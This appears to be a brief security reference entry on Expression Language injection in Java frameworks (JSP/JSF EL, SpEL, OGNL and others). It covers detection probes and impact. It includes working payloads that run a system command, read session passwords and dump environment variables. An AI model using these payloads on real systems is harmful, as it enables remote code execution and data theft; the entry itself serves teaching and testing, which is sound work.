Expression Language Injection

Expression Language Injection (EL Injection) is a class of vulnerabilities where attackers inject code into expression languages used by web frameworks. These languages are designed to access data and call methods, making them powerful attack vectors when user input is evaluated.

Common Expression Languages

• JSP/JSF EL: Java EE unified expression language
• SpEL: Spring Expression Language
• OGNL: Object-Graph Navigation Language (Struts)
• MVEL: MVFLEX Expression Language
• JEXL: Java Expression Language

JSP/JSF EL Example

<!-- Vulnerable: EL evaluated in template -->
${param.input}

<!-- Payload to execute code -->
${Runtime.getRuntime().exec('whoami')}

<!-- Access session/application objects -->
${applicationScope}
${sessionScope.user.password}

Detection

# Test for EL evaluation
${7*7}           # Returns 49
#{7*7}           # Alternative syntax
%{7*7}           # OGNL syntax

# Identify the engine
${T(java.lang.System).getenv()}  # SpEL
%{#context}                        # OGNL

Impact

• Remote code execution
• Access to server-side objects and data
• Authentication bypass
• Information disclosure

See Also

• SpEL Injection
• OGNL Injection
• Server-Side Template Injection